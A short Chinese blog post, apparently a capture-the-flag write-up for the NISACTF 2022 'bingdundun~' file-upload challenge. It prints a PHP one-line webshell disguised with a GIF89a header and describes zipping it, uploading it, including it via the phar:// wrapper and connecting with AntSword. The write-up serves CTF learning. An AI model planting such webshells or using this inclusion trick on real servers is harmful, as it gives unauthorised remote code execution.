文件上传

发布于 2024-10-08 1427 次阅读

[NISACTF 2022]bingdundun~

该题用到了解压缩的伪协议

GIF89a
<?php
phpinfo();
eval($_POST['a']);
?>

先整个一句话木马test.php，待会儿上传用

将test压缩为zip之后上传，payload为http://node5.anna.nssctf.cn:25266/?bingdundun=phar://xxxxxxxxxxxxxxx.zip/test

之后蚁剑连接即可

POP链经典应用

大数据Hadoop实践

Author

xt_mouse

人生苦难处，正是修行时

查看评论 - NOTHING

Comments | NOTHING

暂无评论

取消回复

Markdown Supported while Forbidden

你是我一生只会遇见一次的惊喜 ...

戳我试试 OωO 嘿嘿嘿ヾ(≧∇≦*)ゝ

bilibili~	(=・ω・=)	Tieba

切换主题 | SCHEME TOOL